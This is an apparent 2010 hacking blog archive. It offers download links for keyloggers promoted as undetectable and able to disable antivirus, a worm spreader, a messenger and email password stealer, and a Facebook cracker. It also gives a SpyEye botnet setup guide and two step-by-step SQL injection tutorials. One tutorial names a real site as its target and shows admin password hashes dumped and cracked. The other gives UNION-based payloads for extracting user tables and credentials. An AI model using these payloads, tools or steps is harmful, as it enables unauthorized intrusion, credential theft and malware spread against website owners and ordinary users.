Home » Archives for May 2010
reiluke ALL tools iN oNE
- SQL INJECTION SCANNER
- SQL INJECTION SQLI HELPER 2.7
- ADMIN PAGE FINDER
- PLUS ALL OTHER TOOLS
Download them all at
http://rapidshare.com/files/287748108/reiluke_tools.zip
password: www.reiluke.i.ph
Read More Add your Comment 1 comments
D3vil Hunt3rz Keylogger
USES H00ks (Working On Window7,Vista,Xp)
USB Spread
Anti's-
Anti Keyscrambler
Anti Wireshark
Anti Avira
Anti Malwarebytes
Anti Kaspersky
Anti Ollydbg
Anti Outpost
Anti Norman
Anti BitDefender
Anti NOD32
Anti ZoneAlarm
Anti McAfee
Anti AVG
Anti asquared
Anti Avast
Anti ClamAV
Anti Comodo
Anti Ewido
Anti Panda
Anti TrendMicro
Anti VirusBuster
Anti Symantec
Add To Startup
File Info
Report date: 2010-04-26 1439 (GMT 1)
File name: D3vil_Hunt3rz_Keylogger.exe
File size: 262656 bytes
MD5 Hash: 4a3a90da99da818fc5af0d8da04887e5
SHA1 Hash: 4c9473b2ddd2921683d5c880d90ea8d3e40b0949
Detection rate: 0 on 20 (0%)
Status: CLEAN
Detections
a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -
Scan report generated by
NoVirusThanks.org
Dont test server.exe. Test urself
RapidShare: 1-CLICK Web hosting - Easy Filehosting
Read More Add your Comment 1 comments
Safe3 SQL Injector
Safe3 SQL Injector is one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.
Features:
Full support for GET/Post/Cookie Injection;
Full support for HTTP Basic, Digest, NTLM and Certificate authentications
Full support for MySQL, Oracle, PostgreSQL,MSSQL,ACESS,DB2,Sybase,Sqlite
Full support for Error/Union/Blind/Force SQL injection
Support for file acess,command execute,ip domain reverse,web path guess,md5 crack,etc.
Super bypass WAF
Scan Screen shot:
http://www.multiupload.com/OQZSM8V8DE
Read More Add your Comment 0 comments
Facebook Cracker
Facebooz is a tool for crack facebook password, but you should know the email you want to crack.
I will explain how to use this tool,
1. you must instal java (JRE) to run this tool
2. open tool and add the email you want to do
3. you must have a list of password on the notepad and add it to password box
4. the last, start cracking......
Disable your firewall & Anti Vorus before you run this tool
Read More Add your Comment 0 comments
Facebook Profile Grabber
AutoHideIP 4.7.0.2 100% Working
Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Auto Hide IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button. Auto Hide IP is privacy-protection software which enables you to conceal your real IP address, surf anonymously, and automatically change your IP address every few minutes.
With it, you can select fake IP from different countries via "Choose IP Country" option and can Check IP directly. Using it, you are able to conceal your identity online by showing them a fake IP, blocking hackers and prying eyes from knowing your true location or identity. You can also choose "Launch on Startup" and then it will run and load a fake IP automatically when you log on to Windows. Besides, you can easily switch between fake IP and real IP by simply clicking a button of Hide IP or Stop Hide.
Auto Hide IP works with Internet Explorer, Firefox, Opera, Maxthon, MyIE and is compatible with all types of routers, firewalls, home networks, wireless networks and any other kind of Internet.
Anonymous Web Surfing
Prevent others from seeing your true IP when browsing the Internet. Change your IP frequently with the click of a button!
Protect Your Identity
Identity thieves can use your IP address to monitor your web activity and intercept your private financial information. Criminals, hackers, and even the government can trace your exact location right down to your street address.
Choose IP Country
You can also select fake IP from different countries via "Choose IP Country" option and can Check IP directly.
Send Anonymous E-mails
Prevent your real IP address from being shown in E-mail headers on any Webmail E-mail service such as Yahoo, Hotmail, or Gmail. It is very easy for anyone to find your geographic area you send E-mail from using free publicly available IP lookup tools.
Un-ban Yourself From Forums and Message Boards
Have you been banned from a forum or message board? No problem! Use Auto Hide IP to change your IP allowing you to access any website that has banned you such as eBay, Craigslist, and many browser-based games
http://turboshare.com/files/92670/Auto_Hide_IP_Working_100___Hassanjani_.rar.html
Read More Add your Comment 0 comments
M4x Sql Injection Tools
M4x Sql Injection Tools
•m4x mysql injector more faster than similar programs because it uses different methods
•It has proxy selection according to user choice.
•Datas getting one to one like the other database management systems or scripts.
•You can make your listing process faster because it's include Treeview control
•It's include data limit.It's mean you can get data with what you decide about that
•You can get datas from end(desc) or from start(asc)
•You can see how much time left to end process with progressbar.
•You can export your datas to Microsoft Excel
•If you want do your half work later you can do it easyly with saving your database
•If the m4x mysql injector have database user's permissions, you can execute load_file, into outfile and into dumpfile functions.You can read file which do you want with load file
and you can write your shell to directory which do you want with into out
•It doesn't affect with Magic Quotes Gpc.It doesn't matter on or off
Read More Add your Comment 0 comments
SImPle Spreader [Supports: MSN, P2P, Skype, USB.]
I just made a simple Worm Spreader. Here I made a picture about . Its coded in VB.NET.
Report date: 2010-18-10 1812 (GMT 1)
File name: SimPle_Spreader.exe
File size: 23552 bytes
MD5 Hash: d970b6103fee725374e1f6b4fc3240fa
SHA1 Hash: cc626a8f94610e598f53bbb97fc0be0c7f740d90
Detection rate: 0 on 20 (0%)
Status: CLEAN
Detections
a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -
Scan report generated by
NoVirusThanks.org
http://www.mediafire.com/?mywtjfgy10w
Read More Add your Comment 1 comments
SQLInjection Finder
[CENTER]
NVT Scan result:
File Info
Report date: 2010-05-26 1823 (GMT 1)
File name: sqlifinder.rar
File size: 106219 bytes
MD5 Hash: c6e4dc53b9bf563e1010056caf65213b
SHA1 Hash: d2ce9ecc3ebfc7aedee206ef2a15eb9fc7ba6d1e
Detection rate: 0 on 19 (0%)
Status: CLEAN
Detections
a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -
Scan report generated by
NoVirusThanks.org
DOWNLOAD
Read More Add your Comment 1 comments
sql injection working tool Reluike
Great tool to find sql injection sites and find its database and dump the database and find admin id and passwords
http://rapidshare.com/files/22605516...Masterm1nd.rar
Read More Add your Comment 3 comments
Hacker’s Toolbox 2010
Hacker Toolbox consists of the latest hacking tools. A profusion of hacking, cracking, phreaking tools & files will familiarize you with how hackers break into your machine and steal your information. You can also learn hacking
techniques from a good collection of source codes for virus and tools, instructional documentation, tutorials and much more. You can act like a master hacker to customize your own program with the editors and executable file tools.
Categories: Backdoor, Crack tool, Disassembler, DoS tool, Document, E-mail tool, Editor, Encryption & decryption tool, Executable file tool, Icq tool, Keylogger, MISC, Packet forging, Phreak tool, Scanner, Sniffer, Snoop tool, Source
code, Spoof, Virus.
http://hotfile.com/dl/42851076/a9f16....v3.2.rar.html
Read More Add your Comment 2 comments
All Messengers Password Stealer
hack the following accounts:
PW Messanger Packet
MSN Messenger
Windows Messenger
Yahoo Messenger Google Talk
ICQ Lite
AOL Instand Messenger/Netscape 7
Trilian
Miranda
GAIM
PW Mail Packet
Outlook Express
Microsoft Outlook 2000/XP/2003
IncrediMail
Mozilla Thunderbird
Netscape
Group Mail Free, Gmail
Yahoo Mail
Hotmail / MSN Mail
Eudora
Protected Storage PW Packet
Outlook Passwords
Auto Completet password in IE
Password protected sites in IE
MSN Explorer Passwords
Steam PW Packet
Steam Username
Steam Password
Steam game-path
Game Key Stealer
UT 2003/2004
Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam
Need for Speed Hot Pursuit 2
James Bond 007 Nightfire
Command & Conquer Generals / Zero Hour
SimCity 4
Call of Duty 2 / United Offensive / 1
SWAT 4 / EXP
Windows Info Packet
Windows Username, Windows Computername ect. ect.
Other options are:
FTP Upload Information
Crypt the ploadfile PW Files
Crypt the FTP Settings
Melt Server (Self-Delete after Execute)
File Attribut on hidden set
Icon Changer
UPX Packer
and many more Smiley
UnLimited_PW_-_Stealer_0.40.rar
File Size: 4.40 MB
http://www.multiupload.com/BLGLF8Y9VG
Read More Add your Comment 0 comments
GooglePasswordDecryptor
GooglePasswordDecryptor in Action
is the free tool to recover stored Google account passwords by various applications. Most of the Google's desktop applications such as GTalk, Picassa etc store the account passwords in their private encrypted store to prevent hassale of entering the password everytime. GooglePasswordDecryptor helps in recovering such stored passwords from most of these application's private stores.
It can even show passwords from multiple accounts if you have used more than one Google account.It also comes with 'Export Feature' to save the recovered Google passwords to HTML or TEXT format for future use.
Features of GooglePasswordDecryptor
GooglePasswordDecryptor supports recovering of the stored encrypted password from most of the prominent Google desktop applications as well as internet browsers. Here is the complete list of supported applications.
* Google Talk
* Google Picassa
* Google Desktop Seach
* Gmail Notifier
* Internet Explorer (all versions from 4 to 8)
* Google Chrome
It also provides 'Export Feature' to save the recovered Google passwords to HTML or TEXT format for future use.
Download link:
Read More Add your Comment 0 comments
Blackout Keylogger - 100% FUD - 5 stubs
Features:
100% Scantime and Runtime FUD
Supports Windows XP, Vista and 7!
Destroy AntiVirus: Kill and delete antivirus and security-related programs
Add to startup
Logs EVERYTHING - Runescape, World of warcraft, firefox passwords, IE passwords etc will all be in your logs
http://sharecash.org/download.php?file=466886
Read More Add your Comment 1 comments
[TUT] Setup Spy Eye !! [With Pictures]
This Tutorial is for education purposes ONLY and I am NOT responsible in any way on how you use the information provided and what you do with the files.
Thank you and enjoy reading.
Spy Eye is a new HTTP Botnet:
SpyEye was written on C++, at this moment, exe has size of ~60KB.
Bot is invisible in processes, invisible in files, invisible in autorun (in registry). It works in ring3 mode (like bot Zeus).
It works on OS Windows 2000 to Windows 7.
Step 1:
| |||||
| |||||
|
Step 2:
Upload Main.zip &
Exctract the files.
Step 3:
->> Create a new Database and a User.
-->Add the User to your new database and give it all privileges.
Step 4:
-> Edit /Main Access Panel/config.php
--> Edit /Formgrab Access Panel/config.php
Step 5:
-> Use phpMyAdmin to import all .sql files.
Panels are now ready !!
Step 6:
--> Configure the builder. (Change "yourhosting.com" by your own hosting)
--- >> Try on your own computer
Read More Add your Comment 6 comments
How to hack websites using Auto SQL I Helper V.2.7 + with images
At the beggining "SQLIHelperV.2.7" is a tool that will hack vulnarable websites using SQL injection. You don't have to spend hours and hours trying to find your way in a website and trying hundreds of combinations and codes to hack a website.
This tool will do it all by itself. You only have to tell her what do and where to look.
You can download it from here:
Lets start.
first you need to find the potential website that you think it might be possible to hack it. Remember that some websites are simply unhackable.
After you find your website ( better to end with "article.php?id=[number]" ) example: "http://encycl.anthropology.ru/article.php?id=1"
how to hack this website.
Check if your website can be hacked by trying to go this address :
<------ notice the ' before the number 1.
When open site u will get this msg
Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname
Now open your SQL I Helper V.2.7
and write the link :
<---- without the '
here
and press the inject button.
Now you should wait until the tool finish searching for columns . Time may vary depending on your connection speed , your pc speed , and the number of columns in the website.
So now you should have this:
then select "Get database" and you get this:
Now select any element from the "database name" box and press the "Get tables" button , I will select "anthropo_encycl":
then select any element from the "table name" box and press the "Get columns" button , I will select "user":
then select any elements you want from the "columns name" box and press "Dump Now" , i will select "usr_login" and "usr_pass"
After clicking "Dump Now" , you should see this new window
Now copy the hash on a peace of paper and go to this website:
http://www.md5crack.com/
enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.
hash:21232f297a57a5a743894a0e4a801fc3
username: admin
hash:202cb962ac59075b964b07152d234b70
pass: 123
Some times hash's have salt to protect against sql injection and other tricks
But of course it can still be cracked but it may take lot of time
I use a tool called Passwords pro witch i think it's the best
It can crack almost any hash
You download the software Here
PasswordsPro v2.5
InsidePro PasswordsPro v2.5.1.1 | 2.67 MB
This program is designated to recover passwords for different types of hashes. The program currently supports about 30 types of hashes, and new ones can easily be added through writing own external hashing DLL-module. Actual list of modules available can be found on the forum of the program. Maximal number of hashes to work with at the same time is 64.
Types of hashes supported by:
• MySQL
• MySQL5
• DES (Unix)
• MD4
• MD4 (HMAC)
• MD4 (Base64)
• MD5
• MD5 (APR)
• MD5 (Unix)
• MD5 (HMAC)
• MD5 (Base64)
• MD5 (phpBB3)
• MD5 (Wordpress)
• MD5_HMAC ($ salt, MD5_HMAC ($ salt, $ pass))
• SHA-1
• SHA-1 (HMAC)
• SHA-1 (Base64)
• SHA-256
• SHA-384
• SHA-512
• SHA-256 (PasswordSafe)
• Haval-128
• Haval-160
• Haval-192
• Haval-224
• Haval-256
• Tiger-128
• Tiger-160
• Tiger-192
• Whirlpool
• RAdmin v2.x
• Domain Cached Credentials
• md5 ($ pass. $ Salt)
• md5 ($ salt. $ Pass)
• md5 (md5 ($ pass))
• md5 (md5 (md5 ($ pass)))
• md5 (md5 ($ pass). $ Salt)
• md5 (md5 ($ salt). $ Pass)
• md5 ($ salt.md5 ($ pass))
• md5 ($ salt. $ Pass. $ Salt)
• md5 (md5 ($ salt). Md5 ($ pass))
• md5 (md5 ($ pass). Md5 ($ salt))
• md5 ($ salt.md5 ($ salt. $ Pass))
• md5 ($ salt.md5 ($ pass. $ Salt))
• md5 ($ salt.md5 ($ pass). $ Salt)
• md5 (sha1 (md5 (sha1 ($ pass))))
• md5 ($ hex_salt. $ Pass. $ Hex_salt)
• md5 ($ username.md5 ($ pass). $ Salt)
• md5 (md5 ($ username. $ Pass). $ Salt)
• sha1 ($ salt. $ Pass)
• sha1 ($ username. $ Pass)
• sha1 ($ username. $ Pass. $ Salt)
• sha1 ($ salt.sha1 ($ salt.sha1 ($ pass)))
Type hashes, modules which are written by third-party developers and are available in the distribution of:
• MD2
• MS SQL
• Oracle DES
• Oracle SHA-1
• RipeMD-128
• RipeMD-160
• RipeMD-256
• etc.
Features:
- Recovery of passwords as follows:
• Pre-attack;
• Attack of the full bust (bust including distributed attack);
• The attack on the mask;
• A simple dictionary attack;
• The combined attack on dictionaries;
• Hybrid dictionary attack;
• The attack on the pre-calculated Rainbow-tables;
- Recovery of passwords of length up to 127 characters;
- Recovery of passwords for incomplete hashes of all kinds;
- Editing the hashes of users;
- Find the right information in the list of users with hashes;
- Quick add hash through a dialog box;
- Quick add hashes from the clipboard;
- Quick check of the current password for all users from the list;
- Using tables replace characters in a hybrid dictionary attack;
- Unlimited number of dictionaries used for dictionary attack;
- Unlimited number of tables used in the attack on the Rainbow-tables;
- Unlimited number of users with hashes loaded (in the licensed version);
Homepage - www.insidepro.com
Download: http://www.multiupload.com/P1O585O66M
Password:y-socks.net
Tip: Did you know that vbulletin use's Salt's too
Read More Add your Comment 0 comments
another SQL Injection Full Tutorial
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1
or
www.site.com/id=5
Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:
www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29
If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.
Step 2
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:
www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.
Step 3
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.
Step 4
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database
For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--
The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.
Step 5
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.
Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.
Step 7
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--
Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.
Read More Add your Comment 0 comments
PxLeech v1.0
Info
Simple HTTP leecher which is not created by a yahoo based site but still it gives what we want |
Download
http://www.multiupload.com/W5IFZM5WYQ
Read More Add your Comment 0 comments